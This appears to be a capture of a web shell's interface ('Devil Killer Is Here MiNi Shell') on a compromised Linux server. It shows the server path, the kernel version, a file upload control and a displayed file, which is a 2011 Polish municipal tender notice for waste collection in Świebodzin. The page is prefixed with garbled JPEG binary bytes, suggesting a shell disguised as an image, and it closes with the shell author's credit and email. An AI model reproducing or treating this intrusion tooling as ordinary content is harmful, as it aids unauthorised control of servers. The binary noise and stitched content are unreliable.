JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111221/433628-N-2011.html

<p class="kh_header"><b>Świebodzin: Kompleksowe świadczenie usług wywozu stałych odpadów komunalnych z gminnych nieruchomości oraz obiektów</b><br>
<b>Numer ogłoszenia: 433628 - 2011; data zamieszczenia: 21.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świebodzin , ul. Rynkowa 2, 66-200 Świebodzin, woj. lubuskie, tel. 68 4750916, faks 68 4750916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.swiebodzin.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe świadczenie usług wywozu stałych odpadów komunalnych z gminnych nieruchomości oraz obiektów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Kompleksowe świadczenie usług wywozu stałych odpadów komunalnych z gminnych nieruchomości oraz obiektów, polegających na: 

1. Dostarczeniu i wywozie pojemników będących własnością Wykonawcy usytuowanych w n/w miejscach:

1) Urząd Miejski w Świebodzinie, przy ul. Rynkowej 2:
- 4 pojemniki o poj. 0,12 m3 każdy

2) Na cmentarzach wiejskich:
- w miejscowości Borów - 1 pojemnik o poj. 5 m3
- w miejscowości Jeziory - 1 pojemnik o poj. 5 m3
- w miejscowości Jordanowo - 1 pojemnik o poj. 10 m3
- w miejscowości Lubinicko - 1 pojemnik o poj. 5 m3 
- w miejscowości Rusinów - 2 pojemniki o poj. 1,1 m3 każdy
- w miejscowości Chociule - 1 pojemnik o poj. 5 m3

3) Przy świetlicach wiejskich - po 1 pojemniku o poj. 1,1 m3 w n/w miejscowościach:
- Borów
- Jeziory
- Jordanowo
- Lubinicko
- Kupienino
- Rozłogi
- Rusinów
- Rzeczyca
- Wilkowo
- Ługów
- Glińsk
- Grodziszcze
- Raków
- Rosin 
- Rudgerzowice
- Nowy Dworek
- Lubogóra

4) Na Cmentarzu Komunalnym w Świebodzinie - 12 pojemników otwartych o poj. 10 m3 każdy.

5) Przy Centrum Profilaktyki i Uzależnień, ul. Bramkowa 2 w Świebodzinie - 1 pojemnik o poj. 1,1 m3.

6) Przy magazynie OC w Świebodzinie, ul. Łużycka 14 - 1 pojemnik o poj. 0,12 m3.

7) Na wyrobisku koło Wieży Bismarcka - 1 pojemnik o poj. 10 m3 - nr działki 21 w I obrębie Świebodzina.

8) Przy n/w budynkach komunalnych Gminy Świebodzin, należy dostosować pojemniki do ilości osób zamieszkujących oraz w taki sposób, aby był do nich dogodny dojazd:
- ul. 1 Maja 15 - 11 osób
- ul. J. Piłsudskiego 42 - 5 osób
- ul. Gen. Sikorskiego 6 - 10 osób
- ul. Gen. Sikorskiego 30 - 17 osób
- ul. Generała Świerczewskiego 11 - 6 osób
- ul. Młyńska 8 - 3 osoby
- Plac Wolności 20 - 2 osoby
- Plac Wolności 21 - 4 osoby

1.1. Pojemniki Wykonawca dostarczy na miejsce przeznaczenia na własny koszt.

1.2. Ustawienie we wskazane przez Zamawiającego miejsca odpowiedniej ilości i typu pojemników (mogą być używane, ale estetyczne i w należytym stanie) oraz utrzymanie ich w stanie sprawności technicznej w okresie trwania umowy oraz okresowej ustalonej odrębnymi przepisami dezynfekcji pojemników.

1.3. Opróżnianie i wywóz odpadów komunalnych z następujących jednostek organizacyjnych Gminy Świebodzin:
- Urzędu Miejskiego,
- cmentarzy wiejskich,
- Cmentarza Komunalnego w Świebodzinie,
- świetlic wiejskich,
- Centrum Profilaktyki i Uzależnień,
- magazynu OC,
- wyrobiska koło Wieży Bismarcka
na zgłoszenie telefoniczne przedstawiciela Zamawiającego, jednak krotność wywozu nie częściej niż jak określono w załączniku nr 1a do SIWZ. Każdorazowe opróżnienie i wywóz winno być potwierdzone pisemnie przez przedstawicieli Zamawiającego.

1.4. Wykonawca zobowiązuje się do wywozu odpadów komunalnych w terminie 48 godzin od zgłoszenia telefonicznego przedstawiciela Zamawiającego.

1.5. Opróżnienie i wywóz odpadów komunalnych z budynków komunalnych zgodnie z harmonogramem miesięcznym z częstotliwością określoną w załączniku nr 1a do SIWZ.

1.6. Opróżnienie i wywóz odpadów komunalnych przy pomocy własnych środków transportu, zachowując wszystkie wymogi higieniczno-sanitarne obowiązujące w tym zakresie.

1.7. Wykonawca zapewni uprzątnięcie terenu w zasiekach i miejscach przeznaczonych na ustawienie pojemników w dniu wywozu oraz na telefoniczne zgłoszenie przedstawiciela Zamawiającego.

1.8. Pokrycia kosztów napraw, konserwacji pojemników w razie uszkodzenia oraz kosztów zakupu nowych pojemników w przypadku całkowitego zniszczenia, po aktualnej cenie rynkowej, pokrycia kosztów zakupu nowych pojemników lub jego części składowych, w przypadku kradzieży całego pojemnika lub jego części. Ryzyko utraty, uszkodzenia, zniszczenia pojemników obciąża Wykonawcę usług. 

2. Prowadzenie selektywnej zbiórki odpadów komunalnych w zakresie realizacji przedmiotu zamówienia, o którym mowa w § 1, zgodnie z art. 10 ust. 2 ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. z 2010 r. 185, poz. 1243 z późn. zm.), Podmiot  prowadzący działalność w zakresie odbierania odpadów komunalnych jest obowiązany do selektywnego odbierania odpadów oraz ograniczania ilości odpadów ulegających biodegradacji kierowanych do składowania.

2.1. W ramach wynagrodzenia Wykonawca zobowiązuje się do:

2.1.1. Dostarczenia pojemników o pojemności 1,5 m3 do selektywnego gromadzenia odpadów z zapewnieniem odbioru odpadów:
- szkło białe - typ kontenerowy kolor biały (kod 150107 - opakowania ze szkła)
- szkło kolorowe - typ kontenerowy kolor zielony (kod 150107 - opakowania ze szkła)
- makulatura - typ kontenerowy kolor niebieski (kod 150101 - opakowania z papieru i tektury)
- plastik	 - typ kontenerowy kolor żółty (kod 150102 - opakowania z tworzyw sztucznych)
z niżej wymienionych miejsc określonych przedmiotem zamówienia:

1) Dla budynków komunalnych zlokalizowanych przy następujących ulicach:
- ul. Bramkowej 2
- ul. 1 Maja 15
- ul. J. Piłsudskiego 42
- ul. Gen. Sikorskiego 6
- ul. Gen. Sikorskiego 30
- ul. Generała Świerczewskiego 11
- ul. Młyńskiej 8
- Placu Wolności 20
- Placu Wolności 21
wyznacza się następujące punkty selektywnej zbiórki odpadów:

- parking przy ul. Szpitalnej
- ul. Żaków przy blokach nr 4, 6, 8
- parking koło sklepu NETTO
- teren przy szalecie miejskim na Placu Wolności.

Łącznie 4 szt. kompletów pojemników.

Zamawiający dopuszcza zmianę lokalizacji w/w punktów selektywnej zbiórki odpadów, po uprzednim uzgodnieniu nowych punktów i terminu ich zmiany z Wykonawcą. 

2.1.1.1. Pojemniki wykonane winny być z tworzywa sztucznego np. polietylenu, odporne na uszkodzenia mechaniczne i zróżnicowane warunki atmosferyczne. Pojemniki nie muszą być nowe, ale estetyczne, zachowujące obowiązującą kolorystykę.

2.1.1.2. Zapewnienia opróżniania pojemników do selektywnej zbiorki z częstotliwością zabezpieczającą przed przepełnieniem, ale nie rzadziej niż 3 razy w miesiącu i należytym ich utrzymaniu oraz okresowej ustalonej odrębnymi przepisami dezynfekcji pojemników.

2.1.1.3. Pokrycia kosztów napraw, konserwacji pojemników w razie uszkodzenia oraz kosztów zakupu nowych pojemników w przypadku całkowitego zniszczenia, pokrycia kosztów zakupu nowych pojemników lub jego części składowych, w przypadku kradzieży całego pojemnika lub jego części.

2.1.1.4. Pojemniki służące do wykonania w/w usługi powinny być jednolitego kształtu oraz oznakowane nazwą odpadów w nim składowanych oraz powinny zawierać LOGO i adres Wykonawcy.

2.1.2. Dostarczenia po 1 komplecie worków polietylenowych do selektywnego gromadzenia odpadów z zapewnieniem odbioru odpadów, oznaczonych nadrukiem:

- szkło białe - 1 worek o wymiarach 70 x 110 cm i grubości 0,065 mm
- szkło kolorowe - 1 worek o wymiarach 70 x 110 cm i grubości 0,065 mm
- papier - 1 worek o wymiarach 70 x 110 cm i grubości 0,045 mm
- tworzywa sztuczne - 1 worek o wymiarach 70 x 110 cm i grubości 0,045 mm
z niżej wymienionych miejsc przy świetlicach wiejskich w m.:
- Borów
- Jeziory
- Jordanowo
- Lubinicko
- Kupienino
- Rozłogi
- Rusinów
- Rzeczyca
- Wilkowo
- Ługów
- Glińsk
- Grodziszcze
- Raków
- Rosin
- Rudgerzowice
- Nowy Dworek
- Lubogóra

Łącznie 17 kpl. worków do selektywnej zbiórki odpadów.

2.1.2.1. Odbiór worków do selektywnej zbiórki odpadów z świetlic wiejskich 1 raz na kwartał. Po odbiorze worków, zapewnienie ustawienia nowego kompletu worków.

2.1.2.2. Przekazanie informacji w terminie 14 dni poprzedzających dzień w którym nastąpi odbiór selektywnej zbiórki odpadów z terenu świetlic wiejskich. 
 
2.1.3. Segregacji, magazynowania surowców wtórnych zgodnie z obowiązującymi przepisami w miejscu wskazanym przez Wykonawcę i ich zbycie.

2.1.4. Propagowania selektywnej zbiórki odpadów wśród mieszkańców Gminy w porozumieniu z Urzędem Miejskim i organizacjami proekologicznymi.     

2.1.5. Uprzątnięcia terenu w zasiekach i miejscach przeznaczonych na ustawienie pojemników w dniach wywozu odpadów oraz na telefoniczne zgłoszenie przedstawiciela Zamawiającego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.53.30.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 4 000,00 zł (słownie: cztery tysiące złotych 00/100). Wymagania dotyczące wadium określono w Rozdziale XIV. Specyfikacji Istotnych Warunków Zamówienia</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać spełnianie warunku posiadania zezwolenia obejmującego działalność w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Świebodzin.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać spełnianie warunku dysponowania potencjałem technicznym, co najmniej:    
- 1 samochodem ciężarowym z zabudową bramową,
- 1 śmieciarką bezpylną skrzyniową z przednim załadunkiem do opróżniania kontenerów,
- 1 hakowcem z systemem HDS do selektywnej zbiórki,
- 1 samochodem do przewozu kontenerów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać spełnianie warunku poprzez przedłożenie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na równowartość co najmniej 80 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych. 
2. Zezwolenie obejmujące działalność w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Świebodzin. 
3. Pisemne zobowiązanie podmiotów, o których mowa w Rozdziale X ust. 2 SIWZ, o ile wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych.
4. Dowód potwierdzający opłacenie należnych składek za polisę od odpowiedzialności cywilnej lub za inny dokument w przypadku, gdy z treści polisy lub innego dokumentu nie wynika opłacenie należnych składek.
5. Formularz ofertowy.
6. Kosztorys ofertowy.
7. Pełnomocnictwo w formie oryginału lub notarialnie potwierdzonej kopii (w przypadku jego składania).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy wraz z określeniem warunków takich zmian zawarta jest w Rozdziale XXVI. Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.swiebodzin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świebodzinie, ul. Rynkowa 2, 66-200 Świebodzin, pok. nr 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2011 godzina 12:00, miejsce: Urząd Miejski w Świebodzinie, ul. Rynkowa 2, 66-200 Świebodzin, pok. nr 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com